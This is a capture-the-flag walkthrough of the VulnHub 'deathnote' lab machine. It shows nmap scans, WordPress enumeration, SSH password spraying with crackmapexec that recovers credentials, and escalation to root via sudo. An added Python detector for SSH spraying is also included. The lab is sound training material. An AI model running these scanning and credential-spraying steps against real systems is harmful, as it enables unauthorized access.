Port Scanning

┌──(mikannse㉿kali)-[~/vulnhub/deathnote]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.111
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-07 16:16 HKT
Nmap scan report for 192.168.56.111
Host is up (0.069s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:26:04:09 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 22.53 seconds
┌──(mikannse㉿kali)-[~/vulnhub/deathnote]
└─$ sudo nmap -sT -sC -sV -O -p22,80 192.168.56.111
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-07 16:18 HKT
Nmap scan report for 192.168.56.111
Host is up (0.00062s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5e:b8:ff:2d:ac:c7:e9:3c:99:2f:3b:fc:da:5c:a3:53 (RSA)
| 256 a8:f3:81:9d:0a:dc:16:9a:49:ee:bc:24:e4:65:5c:a6 (ECDSA)
|_ 256 4f:20:c3:2d:19:75:5b:e8:1f:32:01:75:c2:70:9a:7e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:26:04:09 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.22 seconds
┌──(mikannse㉿kali)-[~/vulnhub/deathnote]
└─$ sudo nmap --script=vuln -p22,80 192.168.56.111
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-07 16:19 HKT
Nmap scan report for 192.168.56.111
Host is up (0.00063s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
| /wordpress/: Blog
| /robots.txt: Robots file
| /wordpress/wp-login.php: Wordpress login page.
|_ /manual/: Potentially interesting folder
MAC Address: 08:00:27:26:04:09 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.26 seconds

Web

Visiting port 80 redirects to a WordPress site, so add an entry to the hosts file.

Visiting robots.txt reveals a /important.jpg.

┌──(mikannse㉿kali)-[~/vulnhub/deathnote]
└─$ wget http://deathnote.vuln/important.jpg
┌──(mikannse㉿kali)-[~/vulnhub/deathnote]
└─$ cat important.jpg
i am Soichiro Yagami, light's father
i have a doubt if L is true about the assumption that light is kira

i can only help you by giving something important

login username : user.txt
i don't know the password.
find it by yourself
but i think it is in the hint section of site

The WordPress home page contains a hint, so we also need to find notes.txt.

It turns out that wp-content/uploads/ is directly accessible.

Download notes.txt and user.txt.

Clean up user.txt:

┌──(mikannse㉿kali)-[~/vulnhub/deathnote]
└─$ awk '{print tolower($0)}' user.txt |sort |uniq >user1.txt
┌──(mikannse㉿kali)-[~/vulnhub/deathnote]
└─$ crackmapexec ssh 192.168.56.111 -u user1.txt -p notes.txt --continue-on-success
SSH 192.168.56.111 22 192.168.56.111 [*] SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2
SSH 192.168.56.111 22 192.168.56.111 [-] kira:death4 Authentication failed.
<SNIP>
SSH 192.168.56.111 22 192.168.56.111 [+] l:death4me
SSH 192.168.56.111 22 192.168.56.111 [-] light:death4 Authentication failed.
SSH 192.168.56.111 22 192.168.56.111 [-] light:death4life Authentication failed.
SSH 192.168.56.111 22 192.168.56.111 [-] light:death4u Authentication failed.
SSH 192.168.56.111 22 192.168.56.111 [-] light:death4ever Authentication failed.
SSH 192.168.56.111 22 192.168.56.111 [-] light:death4all Authentication failed.
SSH 192.168.56.111 22 192.168.56.111 [-] light:death420 Authentication failed.

This gives the valid credentials: l:death4me

The correct password was placed last in the list. Well played, author.
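
A defender-side view of the credential spraying shown above, as an added example that is not part of the original write-up: a small parser that flags a source failing SSH passwords against several accounts and then succeeding. The log lines are constructed; the source addresses, timestamps and the user misa are assumptions.

```python
import re
from collections import defaultdict

# Constructed sshd auth.log lines (not from the original write-up); source
# addresses, timestamps and the user "misa" are assumptions for illustration.
SAMPLE_LOG = """\
Dec  7 16:40:01 deathnote sshd[901]: Failed password for kira from 192.168.56.1 port 40112 ssh2
Dec  7 16:40:02 deathnote sshd[903]: Failed password for kira from 192.168.56.1 port 40114 ssh2
Dec  7 16:40:03 deathnote sshd[905]: Failed password for invalid user misa from 192.168.56.1 port 40116 ssh2
Dec  7 16:40:04 deathnote sshd[907]: Failed password for l from 192.168.56.1 port 40118 ssh2
Dec  7 16:40:05 deathnote sshd[909]: Accepted password for l from 192.168.56.1 port 40120 ssh2
Dec  7 16:40:06 deathnote sshd[911]: Failed password for light from 192.168.56.1 port 40122 ssh2
Dec  7 16:52:10 deathnote sshd[950]: Failed password for kira from 192.168.56.20 port 51000 ssh2
Dec  7 16:52:30 deathnote sshd[952]: Accepted password for kira from 192.168.56.20 port 51002 ssh2
"""

EVENT = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def detect_spray(log_text, min_failures=4, min_users=3):
    """Return one finding per source that failed against many distinct users."""
    failures = defaultdict(int)
    users = defaultdict(set)
    accepted = defaultdict(set)
    for line in log_text.splitlines():
        m = EVENT.search(line)
        if not m:
            continue
        src, user = m["src"], m["user"]
        if m["result"] == "Failed":
            failures[src] += 1
            users[src].add(user)
        elif failures[src]:
            # Success from a source that already failed: likely a guessed password.
            accepted[src].add(user)
    findings = []
    for src, count in failures.items():
        if count >= min_failures and len(users[src]) >= min_users:
            findings.append({"source": src, "failures": count,
                             "users_tried": sorted(users[src]),
                             "accepted_for": sorted(accepted[src])})
    return findings

if __name__ == "__main__":
    for finding in detect_spray(SAMPLE_LOG):
        print(finding)
```

The single mistyped login from 192.168.56.20 stays below both thresholds and is not reported; an entry with a non-empty `accepted_for` is the one to treat as a compromised account.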

Privilege Escalation

Port 3306 is also listening locally:

l@deathnote:/home/kira$ ss -tlnp
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 128 [::]:22 [::]:*
LISTEN 0 128 *:80 *:*

The database credentials can be found in wp-config.php:

define( 'DB_USER', 'l' );

/** MySQL database password */
define( 'DB_PASSWORD', 'death4me' );

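Connecting to the database and looking around turned up nothing useful, though.

In the /opt directory there is a case.wav that is actually a text file; running it through CyberChef yields the password for the kira user: kiraisevil

From there, escalate directly: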

kira@deathnote:~$ sudo -l
[sudo] password for kira:
Matching Defaults entries for kira on deathnote:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kira may run the following commands on deathnote:
(ALL : ALL) ALL
kira@deathnote:~$ sudo -i
root@deathnote:~# id
uid=0(root) gid=0(root) groups=0(root)

Ramblings

This room was a bit absurd.